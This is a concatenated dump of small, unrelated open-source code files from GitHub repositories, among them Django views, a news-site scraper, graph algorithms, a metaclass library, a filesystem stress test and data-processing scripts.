method.\n \"\"\"\n max_results = 30\n search_fields = []\n order_results_by = []\n\n def get_search_filters(self, search_terms):\n \"\"\"\n Accumulate a Django queryset filter using Q objects.\n\n For each search term, we need to construct a lookup for each field in self.search_fields by\n OR'ing together Q objects. The lookups for each search term are then ANDed together.\n \"\"\"\n full_search_filter = Q()\n\n for term in search_terms:\n term_filter = Q()\n\n for field in self.search_fields:\n field_filter = {f\"{field}__icontains\": term}\n term_filter |= Q(**field_filter)\n\n full_search_filter &= term_filter\n\n return full_search_filter\n\n\n def run_filter(self, queryset, search_terms):\n search_filter = self.get_search_filters(search_terms)\n return queryset.filter(search_filter).distinct().order_by(*self.order_results_by)\n\n\n def filter_queryset(self, queryset):\n # Split the search string on spaces to turn it into a list. Remove any empty items or preceding/trailing\n # whitespace from individual search terms.\n terms = self.kwargs.get(\"search_terms\", \"\")\n terms = terms.split(\" \")\n terms = [t.strip() for t in terms if t.strip()]\n\n results = self.run_filter(queryset, terms)\n\n # Trim the list of results down to be no longer than _one more than_ the maximum quantity.\n # The presence of 'an extra one on the end' is a straightforward way to convey to the client\n # that more results exist beyond the limit, so it should ask the user to narrow their search.\n length_cutoff = self.max_results + 1\n results = list(results)[:length_cutoff]\n\n return results\n","repo_name":"DelroyBrown/hotend-site","sub_path":"base_models/base_view_classes/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9122589661","text":"# initialize my data variableo\ndata = []\n\n# Read and parse the data file\nfilename = \"data/wxobs20170821.txt\"\n\nwith open(filename, 'r') as datafile:\n\n# read the first three lines (header)\n for _ in range(3):\n datafile.readline()\n# print(_)\n\n# read and parse the rest of the file\n for line in datafile:\n datum = line.split()\n data.append(datum)\n\n# DEBUG\n#print(data[8][4])\n#print(data[8][:5])\n#print(data[8][::2])\n#print(data[0:10])\n#print(data[9])\n#print(data[-1])\n\n#for datum in data[slice(0,10,2)]:\nfor datum in data:\n print(datum)\n","repo_name":"weiwangncar/python_tutorial","sub_path":"mysnd.py","file_name":"mysnd.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11273258115","text":"\n#\n# to run: uwsgi --http :8000 --wsgi-file _helloworld.py\n#\n# to check: localhost:8000\n#\n\n# or just 'sudo service gunicorn start / restart\ndef application(env, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n\n # keys = env.keys() # shows ALL request parameters in a heap\n keys = [\"REQUEST_METHOD\", \"PATH_INFO\", \"QUERY_STRING\"]\n out = \"\"\n for i in keys:\n out += \"{0}: {1}
\\n\".format(i, env[i])\n\n return [\"Hello World
\\n\", out]\n","repo_name":"d3QUone/ask_kasatkin","sub_path":"deploy_info/_helloworld.py","file_name":"_helloworld.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22470358743","text":"# https://www.hackerrank.com/challenges/sherlock-and-squares/problem?utm_campaign=challenge-recommendation&utm_medium=email&utm_source=24-hour-campaign\n\nimport math\n\n\ndef squares(a, b):\n counter = 0\n root = int(math.sqrt(a))\n sqr = root ** 2\n while sqr <= b:\n if sqr >= a:\n counter += 1\n root += 1\n sqr = root ** 2\n return counter\n","repo_name":"BMDroid/HackerRank","sub_path":"squares.py","file_name":"squares.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15073811162","text":"from django.urls import path\nfrom . import views\n\n# URLS DE LOGIN Y RESTAURANTE (API)\nurlpatterns = [\n path('register/', views.RegisterView.as_view(), name='register'), \n path('login/', views.LoginView.as_view()), \n path(\"user/\", views.get_username_view), \n path('logout/', views.user_logout, name='logout'),\n path('restaurantes/', views.ListaRestaurantes.as_view({'get': 'list', 'post': 'create'}), name=\"ListaRestaurantes\"),\n path('restaurantes//', views.ListaRestaurantes.as_view({'get': 'retrieve', 'put': 'update', 'delete': 'destroy'}), name=\"DetalleRestaurante\"), \n]\n","repo_name":"FernandoMPR/RestaurantesApp","sub_path":"Backend/loginUser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8681082654","text":"# -*- coding: UTF-8 -*-\nimport re\nimport os\nimport csv\nimport time\nimport zlib\nimport datetime\nfrom urllib import request\nfrom bs4 import BeautifulSoup\n\nOUTPUT_FOLDER = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'data', 'elpaiscom')\nPORTADA = \"https://elpais.com/\"\nARCHIVO_INDICE = 'index.csv'\nARCHIVO_AUTORES = 'authors.csv'\nBASE_DOMAIN = 'https://elpais.com'\n\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',\n 'Content-Type': 'application/json; charset=UTF-8',\n}\n\n\ndef parse_elpaiscom_date(datestr):\n months_dict = {\n 'ene': '01',\n 'feb': '02',\n 'mar': '03',\n 'abr': '04',\n 'may': '05',\n 'jun': '06',\n 'jul': '07',\n 'ago': '08',\n 'sep': '09',\n 'oct': '10',\n 'nov': '11',\n 'dic': '12',\n }\n matchs = re.search(r'(\\d+) (\\w{3}) (\\d{4})', datestr)\n\n day = f\"0{matchs[1]}\" if len(matchs[1]) == 1 else matchs[1]\n month = months_dict.get(matchs[2])\n\n return f\"{matchs[3]}-{month}-{day}\"\n\ndef scraper_portada():\n response = request.Request(PORTADA)\n pagedata = request.urlopen(response)\n lectura_html = pagedata.read()\n soup = BeautifulSoup(lectura_html, \"html.parser\")\n\n notis = soup.select('.headline')\n output_path = os.path.join(OUTPUT_FOLDER, ARCHIVO_INDICE)\n\n with open(output_path, mode='w', newline='') as output_file:\n writer = csv.writer(output_file, delimiter=',', quotechar='\"',)\n for noti in notis:\n titulo = noti.get_text().strip()\n if len(noti.select('a')):\n enlace = noti.select('a')[0]['href'].strip()\n if enlace.startswith('/'):\n enlace = BASE_DOMAIN + enlace\n writer.writerow([titulo, enlace])\n\n\ndef scraper_articulos():\n source_path = os.path.join(OUTPUT_FOLDER, ARCHIVO_INDICE)\n output_path = os.path.join(OUTPUT_FOLDER, ARCHIVO_AUTORES)\n articles_dir = os.path.join(OUTPUT_FOLDER, 'articles')\n\n with open(output_path, mode='a+', newline='') as autores_file:\n writer = csv.writer(autores_file, delimiter=',', quotechar='\"',)\n\n with open(source_path, mode='r') as indice_file:\n rows = csv.reader(indice_file, delimiter=',')\n for row in rows:\n if len(row) and row[1].startswith(BASE_DOMAIN):\n enlace = row[1]\n time.sleep(1)\n print('Enlace:', enlace)\n\n # Get article name\n nombre = enlace.replace('https://elpais.com/', '').replace('/', '').replace('-', '').replace('_', '').replace('.', '').replace('&', '').replace('?', '')\n nombre += '.txt'\n\n response = request.Request(enlace, headers=HEADERS)\n pagedata = request.urlopen(response)\n if pagedata.info().get('Content-Encoding') == 'gzip':\n lectura_html = zlib.decompress(pagedata.read(), 16+zlib.MAX_WBITS)\n else:\n lectura_html = pagedata.read()\n\n soup = BeautifulSoup(lectura_html, \"html.parser\")\n\n sections = soup.select('.article_body p')\n if not len(sections):\n sections = soup.select('.articulo-cuerpo p')\n\n if not len(soup.select('.a_h .a_pt .a_ti')):\n if len(soup.select('[name=\"date\"]')):\n fechas = soup.select('[name=\"date\"]')\n else:\n fechas = soup.select('[name=\"DC.date\"]')\n fecha = fechas[0]['content'][:10]\n else:\n fechas = soup.select('.a_h .a_pt .a_ti')\n fecha = fechas[0].get_text()\n\n autores = soup.select('.a_auts .a_aut')\n autor_class = '.a_aut_n'\n autor_twitter_class = '.twitter'\n if not len(autores):\n autor_class = '.autor-texto a'\n autor_twitter_class = '.boton_twitter'\n autores = soup.select('.firma .autor')\n\n for autor in autores:\n\n # Get author profile\n if len(autor.select(autor_class)):\n autor_nombre = autor.select(autor_class)[0].get_text()\n autor_enlace = autor.select(autor_class)[0]['href']\n else:\n autor_nombre = '?'\n autor_enlace = ''\n\n # Get author twitter profile\n if len(autor.select(autor_twitter_class)):\n autor_twitter = autor.select(autor_twitter_class)[0]['href']\n else:\n autor_twitter = ''\n\n writer.writerow([\n autor_nombre, autor_enlace, autor_twitter, len(autores), enlace, nombre, fecha\n ])\n\n # Save articles on .txt files\n article_path = os.path.join(articles_dir, nombre)\n with open(article_path, mode='w', newline='') as article_file:\n for section in sections:\n article_file.write(section.get_text())\n\n\nif __name__ == \"__main__\":\n scraper_portada()\n scraper_articulos()\n","repo_name":"datairahub/journalist-ranking","sub_path":"scrapers/elpaiscom.py","file_name":"elpaiscom.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32884962744","text":"# Реализовать функцию, принимающую два числа (позиционные аргументы) и\r\n# выполняющую их деление. Числа запрашивать у пользователя, предусмотреть\r\n# обработку ситуации деления на ноль.\r\n\r\ndef my_division(dividend=float(input('Enter the dividend value: '))\r\n , divider=float(input('Enter the divider value: '))):\r\n \"\"\"Returns result of dividing two numbers\"\"\"\r\n while divider == 0:\r\n try:\r\n divider != 0\r\n return dividend / divider\r\n except ZeroDivisionError:\r\n print('Error! '\r\n 'The divisor value cannot be equal to zero')\r\n divider = float(input('Enter the divider value: '))\r\n return dividend / divider\r\n\r\n\r\nprint(my_division())\r\n","repo_name":"AlSavva/Python-basics-homework","sub_path":"homework3-1.py","file_name":"homework3-1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14441833323","text":"def main () :\n input_file = open('payments.in',\"r\")\n output_file = open('payments.out', \"w\")\n names = []\n payments = []\n all_lines = input_file.readlines()\n for read_string in all_lines :\n name, payment = read_string.split()\n if not name in names :\n names.append(name)\n payments.append(int(payment))\n else :\n payments[names.index(name)] += int(payment)\n\n for name in names :\n output_file.write(name + ' ' + str(payments[names.index(name)]) + '\\n')\n \n \n input_file.close()\n output_file.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"parallel-p/please","sub_path":"problems_on_please/payments/solutions/payments.py","file_name":"payments.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"13024596064","text":"from class_only_design import constants\nfrom class_only_design import util\n\n# This is inserted into decorated classes. Note, __new__ is implicitly converted to a staticmethod\n# during class creation. I'm doing so explicitly here so I have a reference I can check later. This\n# seems to prevent the implicit transformation, but I'm not sure if that's an implementation\n# detail.\n@staticmethod\ndef __new__(*args, **kwargs):\n raise TypeError(\"Class Only classes cannot be instantiated\")\n\n\nclass OnlyMeta(type):\n def __new__(cls, name, bases, classdict):\n\n if \"__init__\" in classdict:\n raise TypeError(\"Class Only classes cannot define __init__\")\n if classdict.get(\"__new__\") not in (__new__, None):\n raise TypeError(\"Class Only classes cannot define __new__\")\n\n # Disallow bases that have __new__ or __init__ defined\n for b in bases:\n if not isinstance(b, cls):\n if b.__init__ is not object.__init__:\n raise TypeError(\"Class Only classes cannot define __init__\", b)\n if b.__new__ is not object.__new__:\n raise TypeError(\"Class Only classes cannot define __new__\", b)\n\n # Insert our own __new__\n classdict[\"__new__\"] = __new__\n return super().__new__(cls, name, bases, classdict)\n\n def __setattr__(cls, name, arg):\n if not getattr(cls, \"_initializing_\", False):\n raise TypeError(\"Class Only classes are immutable\")\n return super().__setattr__(name, arg)\n\n\nclass MetaNamespace(OnlyMeta):\n def __new__(cls, name, bases, classdict):\n # disallow reserved names\n bad_names = classdict.keys() & constants.RESERVED_NAMES\n\n for b in bases:\n if not isinstance(b, cls):\n bad_names |= vars(b).keys() & constants.RESERVED_NAMES\n if bad_names:\n raise ValueError(\n \"Cannot create namespace class with reserved names\", sorted(bad_names)\n )\n classdict['_initializing_'] = True\n created_class = super().__new__(cls, name, bases, classdict)\n created_class.nameof = util.KeyGetter(created_class)\n del created_class._initializing_\n return created_class\n\n def __iter__(cls):\n # Walk up the mro, looking for namespace classes. Keep track of attrs we've already seen\n # and don't re-yield their values\n seen_attrs = set()\n for c in cls.__mro__:\n if isinstance(c, MetaNamespace):\n for k, v in vars(c).items():\n if not util._is_internal(k) and k not in seen_attrs:\n seen_attrs.add(k)\n yield v\n\n @classmethod\n def __prepare__(metacls, name, bases, **kwds):\n return util.NamespaceLoader()\n","repo_name":"InvestmentSystems/class-only-design","sub_path":"class_only_design/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"34628556183","text":"#!/usr/bin/env python3\n\nimport heapq\n\n\nclass Node():\n \"\"\"A class to represent nodes in a DirectedGraph. It has attributes for\n performing DFS.\"\"\"\n\n def __init__(self, i):\n self.id = i\n self.edges = []\n self.rev_edges = []\n self.explored = False\n self.fin_time = 0\n self.leader = 0\n\n def add_edge(self, edge_id):\n self.edges.append(edge_id)\n\n def add_rev_edge(self, edge_id):\n self.rev_edges.append(edge_id)\n\n def mark_explored(self):\n self.explored = True\n\n def set_leader(self, leader_id):\n self.leader = leader_id\n\n\nclass DirectedGraph():\n \"\"\"A class to represent directed graphs via the adjacency list approach.\n Each dictionary entry is a Node.\"\"\"\n\n def __init__(self, length, list_of_edges):\n self.nodes = {}\n self.nodes_by_fin_time = {}\n self.length = length\n self.fin_time = 0 # counter for the finishing time\n self.leader_count = 0 # counter for the size of leader nodes\n self.scc_heapq = [] # heapq to store the ssc by size\n\n for n in range(1, length + 1):\n self.nodes[str(n)] = Node(str(n))\n\n for n in list_of_edges:\n ns = n[0].split(' ')\n self.nodes[ns[0]].add_edge(ns[1])\n self.nodes[ns[1]].add_rev_edge(ns[0])\n\n def n_largest_sccs(self, n):\n \"\"\"Can only be run after compute_sscs.\"\"\"\n return heapq.nlargest(n, self.scc_heapq)\n\n def compute_sccs(self):\n \"\"\"First compute the finishing times and the resulting order of nodes\n via a DFS loop. Second use that new order to compute the SCCs and order\n them by their size.\"\"\"\n\n # Go through the given graph in reverse order, computing the finishing\n # times of each node, and create a second graph that uses the finishing\n # times as the IDs.\n i = self.length\n while i > 0:\n node = self.nodes[str(i)]\n if not node.explored:\n self.dfs_fin_times(str(i))\n i -= 1\n\n # Populate the edges of the nodes_by_fin_time\n for n in self.nodes.values():\n for e in n.edges:\n e_head_fin_time = self.nodes[e].fin_time\n self.nodes_by_fin_time[n.fin_time].add_edge(e_head_fin_time)\n\n # Use the nodes ordered by finishing times to calculate the SCCs.\n i = self.length\n while i > 0:\n self.leader_count = 0\n node = self.nodes_by_fin_time[str(i)]\n if not node.explored:\n self.dfs_leaders(str(i))\n\n heapq.heappush(self.scc_heapq, (self.leader_count, node.id))\n i -= 1\n\n def dfs_fin_times(self, start_node_id):\n curr_node = self.nodes[start_node_id]\n curr_node.mark_explored()\n for e in curr_node.rev_edges:\n if not self.nodes[e].explored:\n self.dfs_fin_times(e)\n\n self.fin_time += 1\n curr_node.fin_time = str(self.fin_time)\n self.nodes_by_fin_time[str(self.fin_time)] = Node(str(self.fin_time))\n\n def dfs_leaders(self, start_node_id):\n curr_node = self.nodes_by_fin_time[start_node_id]\n curr_node.mark_explored()\n for e in curr_node.edges:\n if not self.nodes_by_fin_time[e].explored:\n self.dfs_leaders(e)\n\n self.leader_count += 1\n","repo_name":"ceik/langunita","sub_path":"algorithms/graphs/scc_computation_with_recursion.py","file_name":"scc_computation_with_recursion.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27767652164","text":"import json\n\ndata = {'Analiza Matematyczna': {'Całki Oznaczone': (0, 120), 'Rachunek Różniczkowy': (1, 150)},\n 'Podstawy Informatyki': {'Maszyna Turinga': (0, 60), 'Synchronizacja Wątków': (1, 150)}}\n\nwith open('data.json', 'w') as fp:\n json.dump(data, fp)\n \nwith open('data.json', 'r') as fp:\n data2 = json.load(fp)\n \nfor i in data2.keys():\n print(i)\n print('='*50)","repo_name":"adeorvg/hackathon-HackYeah","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36659215659","text":"# python rand_points.py makePolygon(2528,552,2172,672,1960,832,1944,1056,1848,1396,1596,1884,1216,2332,1048,2616,712,2952,768,3000,1072,2976,1680,2948,2212,2952,2476,2916,2712,2720,2916,2192,2944,1716,2852,1032);\r\n\r\n#######################################\r\n# Parameters:\r\nNUMBER_OF_POINTS = input(\"Number of random squares: \") # Number of random coordinates to select\r\nSQUARE_WIDTH = input(\"Width/Height of squares in pixels: \") # Width/Height of square in pixels\r\nCOORDINATES = input(\"Enter makePolygon coordinates: \")\r\n\r\nBOX_SIZE = int(SQUARE_WIDTH)*0.5\r\n\r\n#######################################\r\n# read node list \r\nimport sys \r\n\r\nnodes=[]\r\n\r\nnode_line=COORDINATES.replace(\"makePolygon\",\"\").replace(\"(\",\"\").replace(\")\",\"\").replace(\";\",\"\")\r\ncols=node_line.split(',')\r\nfor i in range(0,len(cols),2):\r\n node=(float(cols[i]),float(cols[i+1]))\r\n nodes.append( node )\r\nnodes.append(nodes[0])\r\n\r\nx_list=[]\r\ny_list=[]\r\nfor node in nodes:\r\n x_list.append(node[0])\r\n y_list.append(node[1])\r\nMAX_WIDTH = max(x_list)\r\nMAX_HEIGHT = max(y_list)\r\n\r\n\r\n# add more nodes so the selected points are not too close to the border\r\nimport math \r\nedge_nodes=nodes\r\n\r\nwhile True:\r\n max_border_length =0\r\n for i in range(len(edge_nodes)-1):\r\n border_len = (edge_nodes[i][0] - edge_nodes[i+1][0])**2 \\\r\n +(edge_nodes[i][1] - edge_nodes[i+1][1])**2\r\n border_len = math.sqrt(border_len)\r\n \r\n if border_len > max_border_length:\r\n max_border_length = border_len\r\n \r\n if max_border_length < BOX_SIZE * 0.20:\r\n break\r\n \r\n new_edge_nodes=[]\r\n for i in range(len(edge_nodes)-1):\r\n new_edge_nodes.append(edge_nodes[i])\r\n border_len = (edge_nodes[i][0] - edge_nodes[i+1][0])**2 \\\r\n +(edge_nodes[i][1] - edge_nodes[i+1][1])**2\r\n border_len = math.sqrt(border_len)\r\n \r\n if border_len < BOX_SIZE * 0.20:\r\n continue \r\n \r\n middle_node= ( (edge_nodes[i][0]+edge_nodes[i+1][0]) * 0.5, \\\r\n (edge_nodes[i][1]+edge_nodes[i+1][1]) * 0.5 )\r\n new_edge_nodes.append(middle_node)\r\n \r\n new_edge_nodes.append(edge_nodes[-1])\r\n \r\n edge_nodes=new_edge_nodes\r\n\r\n# print 'done edge_nodes', len(edge_nodes) , max_border_length\r\n\r\n#######################################\r\n# generate the point coordinates\r\nimport random\r\npoints=[]\r\nwhile len(points) < int(NUMBER_OF_POINTS):\r\n cor_x=random.randrange(0,MAX_WIDTH)\r\n cor_y=random.randrange(0,MAX_HEIGHT)\r\n \r\n # the points should not be too close to each other\r\n is_overlapping=False\r\n for point in points:\r\n if cor_x > point[0]-BOX_SIZE*2 and cor_x < point[0]+BOX_SIZE*2 \\\r\n and cor_y > point[1]-BOX_SIZE*2 and cor_y < point[1]+BOX_SIZE*2 :\r\n is_overlapping=True\r\n break\r\n\t\t\t\t# centre of squares must be 2*500 px apart in x and y axis\r\n\t\r\n if is_overlapping:\r\n continue \r\n \r\n # the points should not be too close to the border\r\n for node in edge_nodes:\r\n if cor_x > node[0]-BOX_SIZE and cor_x < node[0]+BOX_SIZE \\\r\n and cor_y > node[1]-BOX_SIZE and cor_y < node[1]+BOX_SIZE :\r\n is_overlapping=True\r\n break;\r\n\t\t\t\t# centre of squares must be 500 px apart from border in x and y axis\r\n\t\r\n if is_overlapping:\r\n continue \r\n \r\n # the points should fall into the area\r\n is_oddNodes=False\r\n for i in range(len(nodes)-1):\r\n if ( nodes[i][1] < cor_y and nodes[i+1][1] >= cor_y ) or \\\r\n ( nodes[i][1] >=cor_y and nodes[i+1][1] < cor_y) :\r\n t_ratio = (cor_y - nodes[i][1]) / (nodes[i+1][1]-nodes[i][1])\r\n \r\n if nodes[i][0] + (nodes[i+1][0]-nodes[i][0])* t_ratio < cor_x:\r\n is_oddNodes = not is_oddNodes\r\n \r\n if not is_oddNodes:\r\n continue\r\n \r\n points.append( (cor_x,cor_y))\r\n\r\n#######################################\r\n# print the coordinates\r\nfor point in points:\r\n print(point[0],point[1])\r\n\r\ninput(\"Highlight coordinates and press Enter to add to clipboard. Press Enter again to close window.\")","repo_name":"yaumun/imagej-particle-analysis","sub_path":"Random_Coordinates.py","file_name":"Random_Coordinates.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14233059735","text":"import csv\nimport random\n\nnamefile = open(\"ddb+_bars.txt\", \"r\")\ncitystatefile = open(\"ddb+_city_state.txt\").read().splitlines()\naddrfile = open(\"formatted_address.txt\", \"r\")\nhoursfile = open(\"formatted_times.txt\", \"r\")\nphonefile = open(\"formatted_phone_num.txt\", \"r\")\n\nwith open('bars.csv', 'w') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',')\n name = []\n opening = []\n closing = []\n license_id = []\n phone_num = []\n street = []\n city = []\n state = []\n\n for nameline, hoursline, phoneline, addrline in zip(namefile, hoursfile, phonefile, addrfile):\n name.append(nameline)\n\n hours = hoursline.split(',')\n opening.append(hours[0])\n closing.append(hours[1])\n\n phone_num.append(phoneline)\n\n street.append(addrline)\n\n cityline = random.choice(citystatefile)\n cstate = cityline.split(\", \")\n city.append(cstate[0])\n state.append(cstate[1])\n lid = cstate[1] + str(random.randint(10000, 99999))\n license_id.append(lid)\n\n for x in range(0,len(name)):\n filewriter.writerow([name[x].strip(), opening[x].strip(), \n closing[x].strip(), license_id[x].strip(), \n phone_num[x].strip(), street[x].strip(), city[x].strip(), \n state[x].strip()])\n\nnamefile.close()\naddrfile.close()\nhoursfile.close()\nphonefile.close()","repo_name":"nrf17/Restaurant_Database","sub_path":"table_data/Source Code/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1063018792","text":"from hierarchical_cluster import *\nfrom PIL import Image,ImageDraw\n\ndef drawdendprogram(clust, labels, jpeg='cluster.jpg'):\n # 高度和宽度\n h = getheight(clust) * 20\n w = 1200\n depth = getdepth(clust)\n\n # 由于宽度是固定的,因此我们需要对距离值做相应的调整\n scaling = float(w - 150) / depth\n\n # 新建一个白色背景的图片\n img = Image.new('RGB', (w, h), (255, 255, 255))\n draw = ImageDraw.Draw(img)\n\n draw.line((0, h/2, 10, h/2), fill=(255, 0, 0))\n\n # 画第一个节点\n drawnode(draw, clust, 10, (h/2), scaling, labels)\n img.save(jpeg, 'JPEG')\n\ndef drawnode(draw, clust, x, y, scaling, labels):\n if clust.id < 0:\n h1 = getheight(clust.left) * 20\n h2 = getheight(clust.right) * 20\n top = y - (h1 + h2) / 2\n bottom = y + (h1 + h2) / 2\n # 线的长度\n l1 = clust.distance * scaling\n # 聚类到其子节点的垂直线\n draw.line((x, top + h1 / 2, x, bottom - h2 / 2), fill=(255, 0, 0))\n\n # 连接左侧节点的水平线\n draw.line((x, top + h1 / 2, x + l1, top + h1 / 2), fill=(255, 0, 0))\n\n # 连接右侧节点的水平线\n draw.line((x, bottom - h2 / 2, x + l1, bottom - h2 / 2), fill=(255, 0, 0))\n\n # 调用函数绘制左右节点\n drawnode(draw, clust.left, x + l1, top + h1 / 2, scaling, labels)\n drawnode(draw, clust.right, x + l1, bottom - h2 / 2, scaling, labels)\n else:\n # 如果这是一个叶节点,则绘制节点的标签\n draw.text((x + 5, y - 7), labels[clust.id], (0, 0, 0))","repo_name":"AzureCharles/Beginner-of-Python","sub_path":"generate_pic.py","file_name":"generate_pic.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29170309537","text":"import pytest\nimport os\n\n\n@pytest.mark.parametrize('limit_in_bytes,disk_size,fuzz_only_mount,fsstress_opts', [\n pytest.param(0, '1024MiB', False, ['-p', '1', '-n', '10000'], id='1024mb'),\n pytest.param(0, '1024MiB', True, ['-p', '1', '-n', '10000'], id='1024mb-onlymount'),\n pytest.param(0, '256MiB', False, ['-p', '1', '-n', '10000'], id='256mb'),\n pytest.param(0, '256MiB', True, ['-p', '1', '-n', '10000'], id='256mb-onlymount'),\n pytest.param(100 << 20, '1024MiB', True, ['-p', '1', '-n', '10000'], id='1024mb-onlymount-memcg'),\n])\ndef test_arc_fuse_fsstress(make_container, make_arc_repo, make_sd_disk, make_fs, find_bin, make_cgroup,\n limit_in_bytes, disk_size, fuzz_only_mount, fsstress_opts, logger):\n arc_bin = find_bin('arc')\n fsstress_bin = find_bin('fsstress')\n\n disk = make_sd_disk(size=disk_size, lbpu=1, delay=0)\n fs = make_fs(disk, fs_type='ext4', mkfs_opts=['-q', '-I', '256', '-b', '1024'])\n\n mount = fs + '/mount'\n store = fs + '/store'\n\n os.mkdir(mount)\n os.mkdir(store)\n\n make_arc_repo(mount=mount, store=store)\n\n cgroups = []\n if limit_in_bytes > 0:\n cg = make_cgroup('memory')\n cg['limit_in_bytes'] = limit_in_bytes\n cgroups.append(cg)\n\n task = make_container(cgroups=cgroups)\n\n task.check_call([arc_bin, 'mount', '-m', mount, '-S', store])\n assert os.path.exists(mount + '/README')\n\n task.check_call([fsstress_bin, '-d', mount] + fsstress_opts)\n if not fuzz_only_mount:\n task.check_call([fsstress_bin, '-d', store] + fsstress_opts)\n\n task.check_call([arc_bin, 'unmount', mount])\n assert not os.path.exists(mount + '/README')\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/test/misc/test_arc_fuse.py","file_name":"test_arc_fuse.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4391331583","text":"\"\"\"Contains functions that read/write from a file.\"\"\"\n# All functions should be looked over in general for cleaner solutions.\n\n\ndef get_new_id(filename=\"user_stories.csv\", rowsep=\",r,\"):\n \"\"\"Return an intiger based on how many stories there are in a file.\"\"\"\n try:\n with open(filename, \"r\") as open_file:\n file_data = open_file.readline()\n except FileNotFoundError:\n return 1\n else:\n if not file_data: # file_data == \"\"\n return 1\n file_data = file_data.split(rowsep)\n return len(file_data) + 1\n\n\ndef get_table(filename=\"user_stories.csv\", rowsep=\",r,\", colsep=\",c,\"):\n \"\"\"Read the content of a file and organize it into a table in the followin fashion:\n Each row is a story, a row has:\n 0: ID (int),\n 1: Story title,\n 2: User story,\n 3: Acceptance criteria,\n 4: Buisness value (int),\n 5: Estimation (h) (float),\n 6: Status\n \"\"\"\n # For readibility only. There are indexes in a list.\n identifier = 0\n buisness_val = 4\n estimation = 5\n\n try:\n with open(filename, \"r\") as open_file:\n file_data = open_file.readline()\n except FileNotFoundError:\n return False\n else:\n if not file_data:\n return False\n file_data = file_data.split(rowsep)\n table = []\n for row in file_data:\n table.append(row.split(colsep))\n for row in table:\n row[identifier] = int(row[identifier])\n row[buisness_val] = int(row[buisness_val])\n row[estimation] = float(row[estimation])\n # del identifier, buisness_val, estimation\n return table\n\n\ndef save_table(table, filename=\"user_stories.csv\", rowsep=\",r,\", colsep=\",c,\"):\n \"\"\"Save a table to a file.\"\"\"\n rows = []\n for row in table:\n row[0] = str(row[0])\n row[1] = str(row[1])\n row[2] = str(row[2])\n row[3] = str(row[3])\n row[4] = str(row[4])\n row[5] = str(row[5])\n row[6] = str(row[6])\n rows.append(colsep.join(row))\n file_data = rowsep.join(rows)\n with open(filename, \"w\") as open_file:\n open_file.write(file_data)\n\n\ndef update_story(table, story):\n \"\"\"Return an updated table. New story's ID must match an existing ones.\"\"\"\n idx = 0\n for i, row in enumerate(table):\n if row[0] == int(story[0]):\n idx = i\n break\n table[idx] = story\n return table\n\n\ndef del_story(table, story_id):\n \"\"\"Return an updated table. story_id must match an existing ID.\"\"\"\n found_row = False\n for i in range(len(table)):\n if not found_row:\n if table[i][0] == story_id:\n del table[i]\n found_row = i\n break\n for i in range(len(table)):\n if i >= found_row:\n table[i][0] -= 1\n return table\n","repo_name":"martonMeszaros/super-sprinter-3000-martonMeszaros","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5298746509","text":"import os\nfrom datetime import datetime, time, timedelta\nimport numpy as np\nimport pandas as pd\nimport metview as mv\n\n########################################################################################\n# CODE DESCRIPTION\n# 05_Compute_Climate_Rain_FR.py computes the climatology of rainfall events associated with flash floods.\n# Note: the code can take up 3 hours to run in serial.\n\n# INPUT PARAMETERS DESCRIPTION\n# Year (year, in YYYY format): year to consider.\n# Acc (number, in hours): accumulation to consider.\n# EFFCI_list (list of integers, from 1 to 10): EFFCI indexes to consider.\n# MagnitudeInPerc_Rain_Event_FR_list (list of integers, from 0 to 100): magnitude, in \n# percentile, of rainfall events that can potentially conduct to flash floods.\n# Climate_Percs (list of floats, from 0 to 100): list of percentiles to compute for the rainfall climatology.\n# Format_Climate_Percs (string): format in the output files for the climatology 